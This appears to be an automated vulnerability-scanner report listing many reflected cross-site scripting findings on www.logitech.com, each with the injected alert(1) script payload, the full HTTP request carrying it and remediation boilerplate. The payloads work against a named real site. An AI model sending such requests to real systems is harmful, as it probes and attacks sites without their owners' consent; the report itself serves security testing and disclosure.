Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /50fd2"%3bfe23a5611d8/notebook_products/cooling_pads/devices/6564&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d7f3"><script>alert(1)</script>40a04901c64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /6d7f3"><script>alert(1)</script>40a04901c64/notebook_products/cooling_pads/devices/6564&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 643ca</script><script>alert(1)</script>b81940b0d3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /643ca</script><script>alert(1)</script>b81940b0d3f/notebook_products/cooling_pads/devices/6564&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab762</script><script>alert(1)</script>352e5a5e5e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/notebook_productsab762</script><script>alert(1)</script>352e5a5e5e5/cooling_pads/devices/6564&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7308"><script>alert(1)</script>c7084d1380b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/notebook_productsf7308"><script>alert(1)</script>c7084d1380b/cooling_pads/devices/6564&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d93ca</script><script>alert(1)</script>85b43dfef58 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/notebook_products/cooling_padsd93ca</script><script>alert(1)</script>85b43dfef58/devices/6564&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2bdb"><script>alert(1)</script>303ae6d2c69 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/notebook_products/cooling_padsd2bdb"><script>alert(1)</script>303ae6d2c69/devices/6564&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21b7d"><script>alert(1)</script>6c878351b19 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/notebook_products/cooling_pads/devices21b7d"><script>alert(1)</script>6c878351b19/6564&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9905f</script><script>alert(1)</script>770986710ac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/notebook_products/cooling_pads/devices9905f</script><script>alert(1)</script>770986710ac/6564&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 556c5"><script>alert(1)</script>bca7802a2b6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/notebook_products/cooling_pads/devices/6564556c5"><script>alert(1)</script>bca7802a2b6&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:44:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f76a6</script><script>alert(1)</script>42e2f58a849 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/notebook_products/cooling_pads/devices/6564f76a6</script><script>alert(1)</script>42e2f58a849&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:44:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83784"><script>alert(1)</script>34c41670a34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /83784"><script>alert(1)</script>34c41670a34/remotes/universal_remotes/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91d71</script><script>alert(1)</script>31ba0e2f56e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /91d71</script><script>alert(1)</script>31ba0e2f56e/remotes/universal_remotes/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c817c"><script>alert(1)</script>ba3677a9007 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/remotesc817c"><script>alert(1)</script>ba3677a9007/universal_remotes/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f737e</script><script>alert(1)</script>4904283eeed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/remotesf737e</script><script>alert(1)</script>4904283eeed/universal_remotes/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf8ed"><script>alert(1)</script>8ee15c73203 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/remotes/universal_remotescf8ed"><script>alert(1)</script>8ee15c73203/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdab9</script><script>alert(1)</script>0d82f8843e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/remotes/universal_remotesbdab9</script><script>alert(1)</script>0d82f8843e6/&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e51f"%3b6778eca904f was submitted in the REST URL parameter 1. This input was echoed as 7e51f";6778eca904f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /7e51f"%3b6778eca904f/webcam_communications/video_software_services/4290&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fcf8</script><script>alert(1)</script>b6f95acb9e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1fcf8</script><script>alert(1)</script>b6f95acb9e4/webcam_communications/video_software_services/4290&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d60f"><script>alert(1)</script>4d5856bfcd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /4d60f"><script>alert(1)</script>4d5856bfcd3/webcam_communications/video_software_services/4290&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:42:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21faa</script><script>alert(1)</script>382be98d332 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/webcam_communications21faa</script><script>alert(1)</script>382be98d332/video_software_services/4290&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a91f"><script>alert(1)</script>24a2273758 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /index.cfm/webcam_communications4a91f"><script>alert(1)</script>24a2273758/video_software_services/4290&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46cc0</script><script>alert(1)</script>b94b273a20b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm/webcam_communications/video_software_services46cc0</script><script>alert(1)</script>b94b273a20b/4290&cl=us,en HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:43:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af88"><script>alert(1)</script>18c9552ae81 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
